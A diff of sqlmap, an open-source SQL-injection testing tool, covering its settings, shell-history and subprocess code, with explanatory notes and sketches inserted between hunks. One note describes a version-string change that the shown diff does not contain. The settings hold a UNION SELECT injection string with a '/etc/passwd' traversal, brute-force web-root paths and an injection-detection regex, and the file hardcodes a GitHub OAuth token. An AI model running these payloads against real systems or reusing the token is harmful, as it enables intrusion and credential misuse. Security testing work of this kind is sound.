 GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
-ML = "sqlmap-users@lists.sourceforge.net"
+GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
+
+# colorful banner
+BANNER = """\033[01;33m         _
+ ___ ___| |_____ ___ ___  \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
+|_ -| . | |     | .'| . |
+|___|_  |_|_|_|_|__,|  _|
+      |_|           |_|   \033[0m\033[4;37m%s\033[0m\n
+""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
 
 # Minimum distance of ratio from kb.matchRatio to result in True
 DIFF_TOLERANCE = 0.05
 CONSTANT_RATIO = 0.9
 
+# Ratio used in heuristic check for WAF/IDS/IPS protected targets
+IDS_WAF_CHECK_RATIO = 0.5
+
 # Lower and upper values for match ratio in case of stable page
 LOWER_RATIO_BOUND = 0.02
 UPPER_RATIO_BOUND = 0.98
@@ -37,31 +50,41 @@ UPPER_RATIO_BOUND = 0.98
 # Markers for special cases when parameter values contain html encoded characters
 PARAMETER_AMP_MARKER = "__AMP__"
 PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
+BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
 PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
 PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
 URI_QUESTION_MARKER = "__QUESTION_MARK__"
 ASTERISK_MARKER = "__ASTERISK_MARK__"
 REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
 
-PAYLOAD_DELIMITER = "\x00"
+PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
 CHAR_INFERENCE_MARK = "%c"
 PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
 
+# Regular expression used for recognition of textual content-type
+TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
+
 # Regular expression used for recognition of generic permission messages
 PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
 
 # Regular expression used for recognition of generic maximum connection messages
 MAX_CONNECTIONS_REGEX = r"max.+connections"
 
-# Regular expression used for extracting results from google search
+# Regular expression used for extracting results from Google search
 GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
 
+# Regular expression used for extracting results from DuckDuckGo search
+DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
+
 # Regular expression used for extracting content from "textual" tags
 TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
 
 # Regular expression used for recognition of IP addresses
 IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
 
+# Regular expression used for recognition of generic "your ip has been blocked" messages
+BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
+
 # Dumping characters used in GROUP_CONCAT MySQL technique
 CONCAT_ROW_DELIMITER = ','
 CONCAT_VALUE_DELIMITER = '|'
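VERSION_STRING above now appends a "-nongit-YYYYMMDD" suffix, derived from the settings file's creation time, whenever getRevisionNumber() cannot return a Git revision. A self-contained sketch of that exact expression (REVISION is hard-coded to None here to force the fallback branch):

```python
import os
import time

REVISION = None  # assumed: what getRevisionNumber() returns outside a Git checkout
VERSION = "1.0-dev"

# Same expression as the new VERSION_STRING above, with this script's __file__
# standing in for lib/core/settings.py
VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "-nongit-%s" % time.strftime("%Y%m%d", time.gmtime(os.path.getctime(__file__))))

print(VERSION_STRING)  # e.g. sqlmap/1.0-dev-nongit-20150101
```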
@@ -96,11 +119,14 @@ BACKDOOR_RUN_CMD_TIMEOUT = 5
 # Maximum number of techniques used in inject.py/getValue() per one value
 MAX_TECHNIQUES_PER_VALUE = 2
 
+# In case of missing piece of partial union dump, buffered array must be flushed after certain size
+MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
+
 # Suffix used for naming meta databases in DBMS(es) without explicit database name
 METADB_SUFFIX = "_masterdb"
 
 # Minimum time response set needed for time-comparison based on standard deviation
-MIN_TIME_RESPONSES = 15
+MIN_TIME_RESPONSES = 30
 
 # Minimum comparison ratio set needed for searching valid union column number based on standard deviation
 MIN_UNION_RESPONSES = 5
@@ -120,10 +146,10 @@ INFERENCE_EQUALS_CHAR = "="
 # Character used for operation "not-equals" in inference
 INFERENCE_NOT_EQUALS_CHAR = "!="
 
-# String used for representation of unknown dbms
+# String used for representation of unknown DBMS
 UNKNOWN_DBMS = "Unknown"
 
-# String used for representation of unknown dbms version
+# String used for representation of unknown DBMS version
 UNKNOWN_DBMS_VERSION = "Unknown"
 
 # Dynamicity mark length used in dynamicity removal engine
@@ -145,7 +171,7 @@ IS_WIN = subprocess.mswindows
 PLATFORM = os.name
 PYVERSION = sys.version.split()[0]
 
-# Database management system specific variables
+# DBMS system databases
 MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
 MYSQL_SYSTEM_DBS = ("information_schema", "mysql")  # Before MySQL 5.0 only "mysql"
 PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
@@ -182,10 +208,15 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
 SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
 SUPPORTED_OS = ("linux", "windows")
 
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
+
 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)
 
+# Names that can't be used to name files on Windows OS
+WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
+
 # Items displayed in basic help (-h) output
 BASIC_HELP_ITEMS = (
     "url",
@@ -218,6 +249,7 @@ BASIC_HELP_ITEMS = (
     "checkTor",
     "flushSession",
     "tor",
+    "sqlmapShell",
     "wizard",
 )
 
@@ -239,10 +271,10 @@ ERROR_PARSING_REGEXES = (
 )
 
 # Regular expression used for parsing charset info from meta html headers
-META_CHARSET_REGEX = r'(?si)<head>.*<meta http-equiv="?content-type"?[^>]+charset=(?P<result>[^">]+).*</head>'
+META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
 
 # Regular expression used for parsing refresh info from meta html headers
-META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=(?P<result>[^">]+).*</head>'
+META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
 
 # Regular expression used for parsing empty fields in tested form data
 EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
@@ -259,6 +291,9 @@ WEBSCARAB_SPLITTER = "### Conversation"
 # Splitter used between requests in BURP log files
 BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
 
+# Regex used for parsing XML Burp saved history items
+BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
+
 # Encoding used for Unicode data
 UNICODE_ENCODING = "utf8"
 
@@ -305,7 +340,7 @@ REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
 REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
 
 # Regular expression used for replacing non-alphanum characters
-REFLECTED_REPLACEMENT_REGEX = r".+?"
+REFLECTED_REPLACEMENT_REGEX = r".+"
 
 # Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
 REFLECTED_MAX_REGEX_PARTS = 10
@@ -334,6 +369,12 @@ IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "
 # Regular expression used for recognition of ASP.NET control parameters
 ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
 
+# Prefix for Google analytics cookie names
+GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM"
+
+# Prefix for configuration overriding environment variables
+SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_"
+
 # Turn off resume console info to avoid potential slowdowns
 TURN_OFF_RESUME_INFO_LIMIT = 20
 
@@ -377,13 +418,13 @@ ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
 DUMMY_SQL_INJECTION_CHARS = ";()'"
 
 # Simple check against dummy users
-DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]"
+DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
 
 # Extensions skipped by crawler
-CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jar", "tif", "bmp", "war", "ear", "mpg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "bin", "exe", "iso", "tar", "png", "pdf", "ps", "mp3", "zip", "rar", "gz")
+CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
 
 # Patterns often seen in HTTP headers containing custom injection marking character
-PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(\bq=[^;']+)|(\*/\*)"
+PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
 
 # Template used for common table existence check
 BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
@@ -392,7 +433,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
 
 # Payload used for checking of existence of IDS/WAF (dummier the better)
-IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
+IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
 
 # Vectors used for provoking specific WAF/IDS/IPS behavior(s)
 WAF_ATTACK_VECTORS = (
@@ -406,8 +447,8 @@ WAF_ATTACK_VECTORS = (
 # Used for status representation in dictionary attack phase
 ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 
-# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
-BIGARRAY_CHUNK_LENGTH = 4096
+# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
+BIGARRAY_CHUNK_SIZE = 1024 * 1024
 
 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
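The relaxed META_CHARSET_REGEX above accepts HTML5-style <meta charset="..."> declarations as well as the older http-equiv form. A quick check against both variants (the sample pages are made up for illustration):

```python
import re

META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'

html5 = '<html><head><meta charset="utf-8"><title>t</title></head><body></body></html>'
legacy = '<html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head></html>'

for page in (html5, legacy):
    match = re.search(META_CHARSET_REGEX, page)
    # Prints "utf-8" for the first page and "iso-8859-1" for the second
    print(match.group("result") if match else None)
```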
@@ -442,14 +483,20 @@ DEFAULT_COOKIE_DELIMITER = ';'
 # Unix timestamp used for forcing cookie expiration when provided with --load-cookies
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
+# Github OAuth token used for creating an automatic Issue for unhandled exceptions
+GITHUB_REPORT_OAUTH_TOKEN = "f05e68171afd41a445b1fff80f369fae88b37968"
+
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32
 
 # Number of retries for unsuccessful HashDB flush attempts
 HASHDB_FLUSH_RETRIES = 3
 
+# Number of retries for unsuccessful HashDB end transaction attempts
+HASHDB_END_TRANSACTION_RETRIES = 3
+
 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "cAWxkLYCQT"  # r5129 "".join(random.sample(string.ascii_letters, 10))
+HASHDB_MILESTONE_VALUE = "JHjrBugdDA"  # "".join(random.sample(string.ascii_letters, 10))
 
 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -473,7 +520,10 @@ MAX_DNS_LABEL = 63
 DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
 
 # Alphabet used for heuristic checks
-HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
+HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
 
+# String used for dummy XSS check of a tested parameter value
+DUMMY_XSS_CHECK_APPENDIX = "<'\">"
+
 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
@@ -481,6 +531,9 @@ MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
 # Maximum response total page size (trimmed if larger)
 MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
 
+# Maximum (multi-threaded) length of entry in bisection algorithm
+MAX_BISECTION_LENGTH = 50 * 1024 * 1024
+
 # Mark used for trimming unnecessary content in large chunks
 LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
 
@@ -494,7 +547,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10
 
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
+BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")
 
 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
@@ -506,7 +559,7 @@ MAX_HELP_OPTION_LENGTH = 18
 MAX_CONNECT_RETRIES = 100
 
 # Strings for detecting formatting errors
-FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
+FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
 
 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
@@ -520,15 +573,21 @@ LIMITED_ROWS_TEST_NUMBER = 15
 # Format used for representing invalid unicode characters
 INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"
 
-# Regular expression for SOAP-like POST data
-SOAP_RECOGNITION_REGEX = r"(?s)\A(<\?xml[^>]+>)?\s*<([^> ]+)( [^>]+)?>.+</\2.*>\s*\Z"
+# Regular expression for XML POST data
+XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
+
+# Regular expression used for detecting JSON POST data
+JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
 
 # Regular expression used for detecting JSON-like POST data
-JSON_RECOGNITION_REGEX = r'(?s)\A\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*\Z'
+JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
 
 # Regular expression used for detecting multipart POST data
 MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
 
+# Regular expression used for detecting Array-like POST data
+ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
+
 # Default POST data content-type
 DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
 
@@ -544,23 +603,32 @@ MIN_BINARY_DISK_DUMP_SIZE = 100
 # Regular expression used for extracting form tags
 FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
 
+# Maximum number of lines to save in history file
+MAX_HISTORY_LENGTH = 1000
+
 # Minimum field entry length needed for encoded content (hex, base64,...) check
 MIN_ENCODED_LEN_CHECK = 5
 
 # Timeout in seconds in which Metasploit remote session has to be initialized
-METASPLOIT_SESSION_TIMEOUT = 180
+METASPLOIT_SESSION_TIMEOUT = 300
 
+# Suffix used to mark variables having keyword names
+EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
+
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 
+# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
+CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
+
 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
-    OS.LINUX: ("/var/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
-    OS.WINDOWS: ("/xampp", "/Program Files/xampp/", "/wamp", "/Program Files/wampp/", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
+    OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
+    OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%")
 }
 
 # Suffixes used in brute force search for web server document root
-BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "sites/all", "www/build")
+BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build")
 
 # String used for marking target name inside used brute force web server document root
 BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
@@ -568,6 +636,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
 # Character used as a boundary in kb.chars (preferably less frequent letter)
 KB_CHARS_BOUNDARY_CHAR = 'q'
 
+# Letters of lower frequency used in kb.chars
+KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
+
 # CSS style used in HTML dump format
 HTML_DUMP_CSS_STYLE = """<style>
 table{
@@ -588,4 +659,7 @@ tr:nth-child(even) {
 td{
     font-size:10px;
 }
+th{
+    font-size:10px;
+}
 </style>"""
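The renamed and newly added recognition constants above let the engine tell plain JSON, JSON-like (single-quoted) and PHP-style array POST bodies apart. A short demonstration using the patterns exactly as added; DEFAULT_GET_POST_DELIMITER is defined elsewhere in lib/core/settings.py and is assumed to be "&" here:

```python
import re

JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"
DEFAULT_GET_POST_DELIMITER = '&'  # assumed value; defined elsewhere in settings.py
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)

samples = {
    '{"id": 1, "name": "luther"}': JSON_RECOGNITION_REGEX,
    "{'id': 1, 'name': 'luther'}": JSON_LIKE_RECOGNITION_REGEX,
    "id[]=1&id[]=2": ARRAY_LIKE_RECOGNITION_REGEX,
}

for body, regex in samples.items():
    # Each sample body should be matched by its corresponding recognition pattern
    assert re.search(regex, body) is not None
```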
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -13,14 +13,60 @@ from lib.core import readlineng as readline
 from lib.core.common import Backend
 from lib.core.data import logger
 from lib.core.data import paths
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import OS
+from lib.core.settings import MAX_HISTORY_LENGTH
 
-def saveHistory():
-    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
-    readline.write_history_file(historyPath)
+def readlineAvailable():
+    """
+    Check if the readline is available. By default
+    it is not in Python default installation on Windows
+    """
+
+    return readline._readline is not None
+
+def clearHistory():
+    if not readlineAvailable():
+        return
+
+    readline.clear_history()
+
+def saveHistory(completion=None):
+    if not readlineAvailable():
+        return
+
+    if completion == AUTOCOMPLETE_TYPE.SQL:
+        historyPath = paths.SQL_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.OS:
+        historyPath = paths.OS_SHELL_HISTORY
+    else:
+        historyPath = paths.SQLMAP_SHELL_HISTORY
+
+    try:
+        with open(historyPath, "w+") as f:
+            pass
+    except:
+        pass
+
+    readline.set_history_length(MAX_HISTORY_LENGTH)
+    try:
+        readline.write_history_file(historyPath)
+    except IOError, msg:
+        warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
+        logger.warn(warnMsg)
 
-def loadHistory():
-    historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
+def loadHistory(completion=None):
+    if not readlineAvailable():
+        return
+
+    clearHistory()
+
+    if completion == AUTOCOMPLETE_TYPE.SQL:
+        historyPath = paths.SQL_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.OS:
+        historyPath = paths.OS_SHELL_HISTORY
+    else:
+        historyPath = paths.SQLMAP_SHELL_HISTORY
 
     if os.path.exists(historyPath):
         try:
@@ -47,14 +93,12 @@ class CompleterNG(rlcompleter.Completer):
 
         return matches
 
-def autoCompletion(sqlShell=False, osShell=False):
-    # First of all we check if the readline is available, by default
-    # it is not in Python default installation on Windows
-    if not readline._readline:
+def autoCompletion(completion=None, os=None, commands=None):
+    if not readlineAvailable():
        return
 
-    if osShell:
-        if Backend.isOs(OS.WINDOWS):
+    if completion == AUTOCOMPLETE_TYPE.OS:
+        if os == OS.WINDOWS:
             # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
             completer = CompleterNG({
                 "copy": None, "del": None, "dir": None,
@@ -75,5 +119,11 @@ def autoCompletion(sqlShell=False, osShell=False):
         readline.set_completer(completer.complete)
         readline.parse_and_bind("tab: complete")
 
-    loadHistory()
-    atexit.register(saveHistory)
+    elif commands:
+        completer = CompleterNG(dict(((_, None) for _ in commands)))
+        readline.set_completer_delims(' ')
+        readline.set_completer(completer.complete)
+        readline.parse_and_bind("tab: complete")
+
+    loadHistory(completion)
+    atexit.register(saveHistory, completion)
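saveHistory() and loadHistory() above now pick a history file per shell type, cap it at MAX_HISTORY_LENGTH and downgrade write failures to warnings. A reduced, standalone sketch of that save path (the file names are placeholders for sqlmap's paths.* values):

```python
import readline  # assumed available; on Windows sqlmap falls back when it is not

MAX_HISTORY_LENGTH = 1000  # same cap as the constant added to lib/core/settings.py

HISTORY_PATHS = {
    "sql": "sql_history.txt",      # placeholder for paths.SQL_SHELL_HISTORY
    "os": "os_history.txt",        # placeholder for paths.OS_SHELL_HISTORY
    None: "sqlmap_history.txt",    # placeholder for paths.SQLMAP_SHELL_HISTORY
}

def save_history(completion=None):
    history_path = HISTORY_PATHS.get(completion, HISTORY_PATHS[None])
    readline.set_history_length(MAX_HISTORY_LENGTH)
    try:
        readline.write_history_file(history_path)
    except IOError as ex:
        # Mirrors the new saveHistory(): a broken history file is only worth a warning
        print("there was a problem writing the history file '%s' (%s)" % (history_path, ex))
```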
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -120,7 +120,7 @@ class Popen(subprocess.Popen):
                     nAvail = maxsize
                 if nAvail > 0:
                     (errCode, read) = ReadFile(x, nAvail, None)
-            except ValueError:
+            except (ValueError, NameError):
                 return self._close(which)
             except (subprocess.pywintypes.error, Exception), why:
                 if why[0] in (109, errno.ESHUTDOWN):
@@ -197,4 +197,6 @@ def send_all(p, data):

     while len(data):
         sent = p.send(data)
+        if not isinstance(sent, int):
+            break
         data = buffer(data, sent)
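The send_all() change above guards against a send call that cannot report an integer byte count. A rough standalone sketch of the same guard over a plain non-blocking socket (Python 3, hypothetical helper, not this module's API):

    # Sketch: stop a send loop cleanly when a non-blocking send cannot report progress.
    import socket

    def send_all(sock: socket.socket, data: bytes) -> int:
        """Send as much of `data` as possible; return the number of bytes sent."""
        total = 0
        while data:
            try:
                sent = sock.send(data)
            except BlockingIOError:
                break  # nothing accepted right now; caller may retry later
            if not isinstance(sent, int) or sent <= 0:
                break  # defensive guard, mirroring the hunk above
            total += sent
            data = data[sent:]
        return total
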
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -14,8 +14,11 @@ import time
 import urlparse

 from lib.core.common import Backend
+from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import intersect
+from lib.core.common import normalizeUnicode
+from lib.core.common import openFile
 from lib.core.common import paramToDict
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
@@ -25,6 +28,7 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import mergedOptions
 from lib.core.data import paths
+from lib.core.datatype import InjectionDict
 from lib.core.dicts import DBMS_DICT
 from lib.core.dump import dumper
 from lib.core.enums import HASHDB_KEYS
@@ -36,26 +40,31 @@ from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import _setDBMS
 from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
+from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
+from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
 from lib.core.settings import JSON_RECOGNITION_REGEX
+from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
 from lib.core.settings import MULTIPART_RECOGNITION_REGEX
 from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import REFERER_ALIASES
 from lib.core.settings import RESTORE_MERGED_OPTIONS
 from lib.core.settings import RESULTS_FILE_FORMAT
